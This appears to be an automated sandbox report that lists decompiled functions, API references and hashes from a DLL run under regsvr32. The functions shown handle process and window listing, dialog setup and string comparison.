0x00000000
0x1001f189
0x1001f190
0x1001f194
0x1001f197
0x1001f19b
0x00000000
0x00000000
0x1001f19d
0x1001f1a2
0x1001f1a4
0x1001f1a4
0x00000000
0x1001f1a2
0x1001f109
0x1001f114
0x1001f12b
0x00000000
0x1001f12b
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1001F0B3
GetSystemMetrics.USER32 ref: 1001F177
GlobalLock.KERNEL32 ref: 1001F1E2
CreateDialogIndirectParamA.USER32(?,?,?,Function_0001EB48,00000000), ref: 1001F211

Strings

MS Shell Dlg, xrefs: 1001F181

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateDialogGlobalH_prologIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 2364537584-76309092
Opcode ID: 02ed30a61ad99a6b9c378d6f8cf422091e96cbe3ed39422879770f03b856be4e
Instruction ID: 8445b7602e0903474612167ef95f055d91e510faa3214ef66b7d79f5cf335928
Opcode Fuzzy Hash: 02ed30a61ad99a6b9c378d6f8cf422091e96cbe3ed39422879770f03b856be4e
Instruction Fuzzy Hash: F651CE35900209EFCB11EFA4C8859EEBBB5EF64350F204559F812EB192DB349E85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10005C90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 126
windowprocessCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10005C90(void* __ecx) {
				char _v268;
				void* _v300;
				intOrPtr _v328;
				intOrPtr _v336;
				char _v344;
				intOrPtr _v348;
				void* _v392;
				void* _t31;
				int _t56;
				void* _t60;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t82;

				_t75 = __ecx;
				SendMessageA( *(__ecx + 0x9cc), 0x1009, 0, 0);
				_t31 = CreateToolhelp32Snapshot(0xf, 0);
				_t62 =  &_v300;
				 *(_t75 + 0x74) = _t31;
				_v300 = 0x128;
				 *(_t75 + 0x77c) = Process32First(_t31,  &_v300);
				_t60 = _t75 + 0x67b;
				_t76 = _t75 + 0x57b;
				_t74 = _t75 + 0x9b0;
				do {
					E1001129D(_t62, _t82,  &_v268, _t75 + 0x478, _t75 + 0x47b, _t76, _t60);
					E1001D448(_t74, 1, 0, 0, 0, 0, 0, 0);
					_push(_t60);
					E10011245(_t75 + 0x78, "%s%s ", _t76);
					E1001D300(_t74, 0, 0, _t75 + 0x78);
					E10011245(_t75 + 0x178, "%08X", _v336);
					E1001D300(_t74, 0, 1, _t75 + 0x178);
					E10011245(_t75 + 0x378, "%d", _v328);
					E1001D300(_t74, 0, 2, _t75 + 0x378);
					E10011245(_t75 + 0x278, "%d", _v348);
					_t77 = _t77 + 0x48;
					E1001D300(_t74, 0, 3, _t75 + 0x278);
					E1001D300(_t74, 0, 4,  &_v344);
					_t62 =  &_v392;
					_t56 = Process32Next( *(_t75 + 0x74),  &_v392);
					 *(_t75 + 0x77c) = _t56;
				} while (_t56 != 0);
				CloseHandle( *(_t75 + 0x74));
				return SendMessageA( *(_t75 + 0x9cc), 0x1030, 0, 0);
			}

0x10005c9e
0x10005cac
0x10005cb6
0x10005cbb
0x10005cc1
0x10005cc4
0x10005cd1
0x10005cd7
0x10005cdd
0x10005ce3
0x10005cf0
0x10005d05
0x10005d1d
0x10005d22
0x10005d2d
0x10005d3f
0x10005d55
0x10005d6a
0x10005d80
0x10005d95
0x10005dab
0x10005db0
0x10005dc0
0x10005dd0
0x10005dd8
0x10005dde
0x10005de5
0x10005de5
0x10005df5
0x10005e1b

APIs

SendMessageA.USER32 ref: 10005CAC
CreateToolhelp32Snapshot.KERNEL32 ref: 10005CB6
Process32First.KERNEL32(00000000,?), ref: 10005CCC

Part of subcall function 1001129D: _strlen.LIBCMT ref: 100112AD

Part of subcall function 1001D448: SendMessageA.USER32 ref: 1001D48A

Part of subcall function 1001D300: SendMessageA.USER32 ref: 1001D321

Process32Next.KERNEL32 ref: 10005DDE
CloseHandle.KERNEL32(?,?,?), ref: 10005DF5
SendMessageA.USER32 ref: 10005E0B

Strings

%s%s , xrefs: 10005D27
%08X, xrefs: 10005D4F

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_strlen
String ID: %08X$%s%s
API String ID: 2343269832-3484543480
Opcode ID: f366ffc507e7e3069e60cdbcd24a79bff68196117bde326179d9980ce691bdc7
Instruction ID: 587af4a81c74a4c47c484b0c5cd1c7cce0284cb767108914adff7a162cdec2cb
Opcode Fuzzy Hash: f366ffc507e7e3069e60cdbcd24a79bff68196117bde326179d9980ce691bdc7
Instruction Fuzzy Hash: DD4141B2644B056BE261DB70DC46FEB77ECDB44700F400819F76A9A181DB75B6448791

Uniqueness

Uniqueness Score: -1.00%

Function 10006A40 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10006A40() {
				char _v4;
				intOrPtr _v16;
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				signed int _t22;
				intOrPtr* _t24;
				void* _t30;
				long _t32;
				signed int _t40;
				int _t44;
				long _t45;
				void* _t47;

				_t44 = 0;
				_t45 = _t32;
				if(SendMessageA( *(_t45 + 0x9cc), 0x1004, 0, 0) <= 0) {
					L9:
					SendMessageA( *(_t45 + 0x9cc), 0x1009, 0, 0);
					EnumWindows(E10006560, _t45);
					return SendMessageA( *(_t45 + 0x9cc), 0x1030, 0, 0);
				}
				do {
					if(SendMessageA( *(_t45 + 0x9cc), 0x102c, _t44, 2) == 2) {
						_push(1);
						_push(_t44);
						_t40 =  &_v4;
						_push(_t40);
						_t21 = E100114D3( *((intOrPtr*)(E1001D60B(_t45 + 0x9b0))));
						_t47 = _t47 + 4;
						_t22 = PostMessageA(_t21, 0x10, 0, 0);
						asm("sbb bl, bl");
						_t24 = _v16 + 0xfffffff0;
						_t30 =  ~_t22 + 1;
						asm("lock xadd [ecx], edx");
						if((_t40 | 0xffffffff) - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t24)) + 4))(_t24);
						}
						if(_t30 != 0) {
							E1002027F(_t45, "Couldn\'t close the window", 0, 0);
						}
					}
					_t44 = _t44 + 1;
				} while (_t44 < SendMessageA( *(_t45 + 0x9cc), 0x1004, 0, 0));
				goto L9;
			}

0x10006a4a
0x10006a4e
0x10006a60
0x10006afe
0x10006b0e
0x10006b16
0x10006b32
0x10006b32
0x10006a67
0x10006a7b
0x10006a7d
0x10006a7f
0x10006a80
0x10006a84
0x10006a99
0x10006a9e
0x10006aa2
0x10006ab0
0x10006ab2
0x10006ab5
0x10006abd
0x10006ac4
0x10006acb
0x10006acb
0x10006ad0
0x10006add
0x10006add
0x10006ad0
0x10006af2
0x10006af5
0x00000000

APIs

SendMessageA.USER32 ref: 10006A5C
SendMessageA.USER32 ref: 10006A76
SendMessageA.USER32 ref: 10006AF3

Part of subcall function 1001D60B: __EH_prolog.LIBCMT ref: 1001D610
Part of subcall function 1001D60B: SendMessageA.USER32 ref: 1001D670

PostMessageA.USER32 ref: 10006AA2
SendMessageA.USER32 ref: 10006B0E
EnumWindows.USER32(Function_00006560), ref: 10006B16
SendMessageA.USER32 ref: 10006B2C

Strings

Couldn't close the window, xrefs: 10006AD6

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Send$EnumH_prologPostWindows
String ID: Couldn't close the window
API String ID: 3796729829-678758604
Opcode ID: a9188fad6d9ce2ef9a70b82c75abbea9bb5b9843e58846c950885e95225eed14
Instruction ID: 6c441cf6cc0e9fb159173b976aac16051cedaa664de8912bac0cdc2cdc7b8e57
Opcode Fuzzy Hash: a9188fad6d9ce2ef9a70b82c75abbea9bb5b9843e58846c950885e95225eed14
Instruction Fuzzy Hash: 7921D6717817417BF220E775CC86F97779AEB8ABA1F208518F35AAF1D1DAA0B4018614

Uniqueness

Uniqueness Score: -1.00%

Function 10006580 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006580(void* __ecx) {
				void* _t34;

				_t34 = __ecx;
				E1001EF78(__ecx);
				SendMessageA( *(_t34 + 0x1c), 0x80, 1,  *(_t34 + 0xa50));
				E1001D3BE(_t34 + 0xa00, 1, 0, "&Processes", 0, 0);
				E1001D3BE(_t34 + 0xa00, 1, 1, "&Windows", 0, 0);
				SendMessageA( *(_t34 + 0x9cc), 0x1001, 0, 0);
				SendMessageA( *(_t34 + 0x9cc), 0x1026, 0, 0);
				SendMessageA( *(_t34 + 0x9cc), 0x1024, 0, 0xff00);
				SendMessageA( *(_t34 + 0x9cc), 0x1036, 0, SendMessageA( *(_t34 + 0x9cc), 0x1037, 0, 0) | 0x00000030);
				E10006450(_t34, SendMessageA( *(_t34 + 0x9cc), 0x1037, 0, 0) | 0x00000030);
				return 1;
			}

0x10006583
0x10006585
0x100065a2
0x100065b9
0x100065cd
0x100065e2
0x100065f4
0x10006609
0x1000662f
0x10006633
0x10006640

APIs

SendMessageA.USER32 ref: 100065A2

Part of subcall function 1001D3BE: SendMessageA.USER32 ref: 1001D3EB

SendMessageA.USER32 ref: 100065E2
SendMessageA.USER32 ref: 100065F4
SendMessageA.USER32 ref: 10006609
SendMessageA.USER32 ref: 1000661B
SendMessageA.USER32 ref: 1000662F

Strings

&Windows, xrefs: 100065C2
&Processes, xrefs: 100065A8

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend
String ID: &Processes$&Windows
API String ID: 3850602802-2420473455
Opcode ID: 3b63bf40ea6407cd7288c9d7e341552d29b1c36b5b1006bbeffa077e9a246eea
Instruction ID: bde570b2ca278c9b4ebfd3646b7d43a8c3087c49f07119d256a2563d362ed234
Opcode Fuzzy Hash: 3b63bf40ea6407cd7288c9d7e341552d29b1c36b5b1006bbeffa077e9a246eea
Instruction Fuzzy Hash: 25114475BD170436F234E6748C83F9AA2999F94F40F204819F756BF1C1C9F5B8814758

Uniqueness

Uniqueness Score: -1.00%

Function 1002404A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002404A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x100371f4; // 0x39cf7dc9
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E10011A49(E10023F12(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}

0x10024050
0x10024057
0x10024060
0x10024063
0x10024066
0x10024069
0x1002406e
0x10024072
0x1002407c
0x1002408b
0x1002408f
0x1002409c
0x1002409e
0x100240a0
0x100240a0
0x100240bb
0x100240bd
0x100240bd
0x100240c3
0x100240c8
0x100240ca
0x100240ca
0x100240e5
0x100240e5
0x10024076
0x1002407a
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 1002406E
GetStockObject.GDI32(0000000D), ref: 10024076
GetObjectA.GDI32(00000000,0000003C,?), ref: 10024083
GetDC.USER32(00000000), ref: 10024092
GetDeviceCaps.GDI32(00000000,0000005A), ref: 100240A6
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100240B2
ReleaseDC.USER32 ref: 100240BD

Strings

System, xrefs: 10024069, 100240D3

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: be9953e09329149153235f10064d0c1d86043838a4ef33d0fe9ce1ebdbda3fae
Instruction ID: 893a637e2b34bc5ffcf38017b698dc3b34be9f6003aa545906df9413b754d187
Opcode Fuzzy Hash: be9953e09329149153235f10064d0c1d86043838a4ef33d0fe9ce1ebdbda3fae
Instruction Fuzzy Hash: BC115131A00228EBEB10EBA0DDC9F9E7BB8EF04784F510115F705AB181DBB49D42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001FFD0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E1001FFD0(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

0x1001ffd3
0x1001ffe0
0x1001ffe2
0x1001ffe8
0x1001ffec
0x10020045
0x1001ffee
0x1001fff4
0x1001fff6
0x1001fffe
0x1002001b
0x10020023
0x10020027
0x1002002b
0x1002002d
0x10020033
0x10020033
0x1002002b
0x10020000
0x1002000f
0x10020011
0x10020017
0x10020017
0x1002000f
0x1002003a
0x00000000
0x10020040

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,1002097F,?,00040000), ref: 1001FFD9
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 1001FFE2
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 1001FFF6
#17.COMCTL32 ref: 10020011
#17.COMCTL32 ref: 1002002D
FreeLibrary.KERNEL32(00000000), ref: 1002003A

Strings

InitCommonControlsEx, xrefs: 1001FFEE
COMCTL32.DLL, xrefs: 1001FFD3, 1001FFD8, 1001FFDF

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: e9a7edff98b2f1dfa264ae8824ddf5643f812fe85e75b71ac61c600836a9cfcb
Instruction ID: 53882839bd82eee4790a95edd8c01e06678a9dcaf01e434a7ea0d4cd47d31c11
Opcode Fuzzy Hash: e9a7edff98b2f1dfa264ae8824ddf5643f812fe85e75b71ac61c600836a9cfcb
Instruction Fuzzy Hash: ACF08132A047639BE212DFA4ADC8A1FB6E9EF84391B560464FC10E3111CB64DC0A8661

Uniqueness

Uniqueness Score: -1.00%

Function 1001C7BE Relevance: 13.8, APIs: 9, Instructions: 291
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001C7BE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				short* _t163;
				int _t166;
				void* _t167;
				int _t168;
				void* _t169;
				short* _t170;
				void* _t175;

				_push(0x40);
				_push(0x1002fa80);
				E10012CE0(__ebx, __edi, __esi);
				_t94 =  *0x100371f4; // 0x39cf7dc9
				 *((intOrPtr*)(_t169 - 0x1c)) = _t94;
				_t162 = 0;
				_t166 = 1;
				_t175 =  *0x1003a650 - _t162; // 0x0
				if(_t175 == 0) {
					if(CompareStringW(0, 0, 0x1002e9cc, 1, 0x1002e9cc, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x1003a650 = 2;
						}
					} else {
						 *0x1003a650 = 1;
					}
				}
				if( *(_t169 + 0x14) > _t162) {
					 *(_t169 + 0x14) = E1001C7A2( *(_t169 + 0x10),  *(_t169 + 0x14));
				}
				_t95 =  *(_t169 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E1001C7A2( *(_t169 + 0x18), _t95);
					 *(_t169 + 0x1c) = _t95;
				}
				_t144 =  *0x1003a650; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t169 - 0x38) = _t162;
					__eflags =  *(_t169 + 8) - _t162;
					if( *(_t169 + 8) == _t162) {
						_t109 =  *0x1003a4c0; // 0x0
						 *(_t169 + 8) = _t109;
					}
					_t142 =  *(_t169 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x1003a4d0; // 0x0
					}
					_t167 = E10019AB4( *(_t169 + 8));
					__eflags = _t167 - 0xffffffff;
					if(_t167 != 0xffffffff) {
						__eflags = _t167 - _t142;
						if(__eflags == 0) {
							L67:
							_t166 = CompareStringA( *(_t169 + 8),  *(_t169 + 0xc),  *(_t169 + 0x10),  *(_t169 + 0x14),  *(_t169 + 0x18),  *(_t169 + 0x1c));
							__eflags = _t162;
							if(_t162 != 0) {
								_push(_t162);
								E1001111B();
								_push( *(_t169 - 0x38));
								E1001111B();
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t169 + 0x14);
						_push( *(_t169 + 0x10));
						_push(_t167);
						_push(_t142);
						_t162 = E10019AF7(_t142, _t162, _t167, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t169 + 0x1c);
						_push( *(_t169 + 0x18));
						_push(_t167);
						_push(_t142);
						_t106 = E10019AF7(_t142, _t162, _t167, __eflags);
						 *(_t169 - 0x38) = _t106;
						__eflags = _t106;
						if(_t106 != 0) {
							 *(_t169 + 0x10) = _t162;
							 *(_t169 + 0x18) =  *(_t169 - 0x38);
							goto L67;
						}
						_push(_t162);
						E1001111B();
					}
					goto L61;
				} else {
					if(_t144 != _t166) {
						L61:
						_t98 = 0;
						L70:
						return E10012D1B(E10011A49(_t98,  *((intOrPtr*)(_t169 - 0x1c))));
					}
					 *(_t169 - 0x3c) = _t162;
					 *(_t169 - 0x44) = _t162;
					 *(_t169 - 0x40) = _t162;
					if( *(_t169 + 0x20) == _t162) {
						_t144 =  *0x1003a4d0; // 0x0
						 *(_t169 + 0x20) = _t144;
					}
					if( *(_t169 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t169 + 0x14) != _t95) {
							__eflags = _t95 - _t166;
							if(_t95 > _t166) {
								L69:
								_t98 = _t166;
								goto L70;
							}
							__eflags =  *(_t169 + 0x14) - _t166;
							if( *(_t169 + 0x14) <= _t166) {
								_t111 = GetCPInfo( *(_t169 + 0x20), _t169 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t169 + 0x14) - _t162;
								if( *(_t169 + 0x14) <= _t162) {
									__eflags =  *(_t169 + 0x1c) - _t162;
									if( *(_t169 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t169 - 0x30) - _t141;
									if( *(_t169 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t169 - 0x2a;
									__eflags =  *((char*)(_t169 - 0x2a));
									if( *((char*)(_t169 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t169 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t169 - 0x30) - _t141;
								if( *(_t169 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t169 - 0x2a;
								__eflags =  *((char*)(_t169 - 0x2a));
								if( *((char*)(_t169 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t169 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t169 + 0x20), 9,  *(_t169 + 0x10),  *(_t169 + 0x14), _t162, _t162);
						 *(_t169 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t169 - 4) = _t162;
						E100116D0(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t169 - 0x18) = _t170;
						 *(_t169 - 0x34) = _t170;
						 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
						_t118 =  *(_t169 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t169 + 0x20), _t166,  *(_t169 + 0x10),  *(_t169 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t169 - 0x3c);
								if( *(_t169 - 0x3c) != 0) {
									_push( *(_t169 - 0x34));
									E1001111B();
								}
								_t98 =  *(_t169 - 0x40);
								goto L70;
							}
							_t168 = MultiByteToWideChar( *(_t169 + 0x20), 9,  *(_t169 + 0x18),  *(_t169 + 0x1c), 0, 0);
							 *(_t169 - 0x4c) = _t168;
							__eflags = _t168;
							if(_t168 == 0) {
								goto L53;
							}
							 *(_t169 - 4) = 1;
							E100116D0(_t168 + _t168 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t169 - 0x18) = _t170;
							_t163 = _t170;
							 *(_t169 - 0x50) = _t163;
							 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
							__eflags = _t163;
							if(_t163 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t169 + 0x20), 1,  *(_t169 + 0x18),  *(_t169 + 0x1c), _t163, _t168);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t169 - 0x40) = CompareStringW( *(_t169 + 8),  *(_t169 + 0xc),  *(_t169 - 0x34), _t143, _t163, _t168);
								}
								__eflags =  *(_t169 - 0x44);
								if( *(_t169 - 0x44) != 0) {
									_push(_t163);
									E1001111B();
								}
								goto L53;
							} else {
								_t163 = E10011233(_t168 + _t168);
								__eflags = _t163;
								if(_t163 == 0) {
									goto L53;
								}
								 *(_t169 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E10011233(_t143 + _t143);
							_pop(_t144);
							 *(_t169 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t169 - 0x3c) = _t166;
							goto L43;
						}
					}
				}
			}

0x1001c7be
0x1001c7c0
0x1001c7c5
0x1001c7ca
0x1001c7cf
0x1001c7d2
0x1001c7d6
0x1001c7d7
0x1001c7dd
0x1001c7f2
0x1001c7fc
0x1001c802
0x1001c805
0x1001c807
0x1001c807
0x1001c7f4
0x1001c7f4
0x1001c7f4
0x1001c7f2
0x1001c814
0x1001c822
0x1001c822
0x1001c825
0x1001c82a
0x1001c830
0x1001c836
0x1001c836
0x1001c839
0x1001c841
0x1001c844
0x1001ca83
0x1001ca86
0x1001ca89
0x1001ca8b
0x1001ca90
0x1001ca90
0x1001ca93
0x1001ca96
0x1001ca98
0x1001ca9a
0x1001ca9a
0x1001caa9
0x1001caab
0x1001caae
0x1001cab4
0x1001cab6
0x1001cb01
0x1001cb19
0x1001cb1b
0x1001cb1d
0x1001cb1f
0x1001cb20
0x1001cb25
0x1001cb28
0x1001cb2e
0x00000000
0x1001cb1d
0x1001cab8
0x1001caba
0x1001cabf
0x1001cac0
0x1001cac3
0x1001cac4
0x1001cacd
0x1001cacf
0x1001cad1
0x00000000
0x00000000
0x1001cad3
0x1001cad5
0x1001cada
0x1001cadb
0x1001cade
0x1001cadf
0x1001cae0
0x1001cae8
0x1001caeb
0x1001caed
0x1001caf8
0x1001cafe
0x00000000
0x1001cafe
0x1001caef
0x1001caf0
0x1001caf5
0x00000000
0x1001c852
0x1001c854
0x1001cab0
0x1001cab0
0x1001cb31
0x1001cb41
0x1001cb41
0x1001c85a
0x1001c85d
0x1001c860
0x1001c866
0x1001c868
0x1001c86e
0x1001c86e
0x1001c874
0x1001c881
0x1001c88a
0x1001c88c
0x1001cb2f
0x1001cb2f
0x00000000
0x1001cb2f
0x1001c892
0x1001c895
0x1001c8a6
0x1001c8ac
0x1001c8ae
0x00000000
0x00000000
0x1001c8b4
0x1001c8b7
0x1001c8e4
0x1001c8e7
0x00000000
0x00000000
0x1001c8e9
0x1001c8ec
0x00000000
0x00000000
0x1001c8f2
0x1001c8f5
0x1001c8f9
0x00000000
0x00000000
0x00000000
0x00000000
0x1001c8ff
0x1001c8ff
0x1001c8ff
0x1001c902
0x1001c904
0x00000000
0x00000000
0x1001c90d
0x1001c90f
0x1001c911
0x1001c91b
0x1001c91b
0x1001c91d
0x1001c920
0x00000000
0x00000000
0x00000000
0x1001c922
0x1001c913
0x1001c915
0x00000000
0x00000000
0x00000000
0x1001c915
0x00000000
0x1001c8ff
0x1001c8b9
0x1001c8bc
0x00000000
0x00000000
0x1001c8be
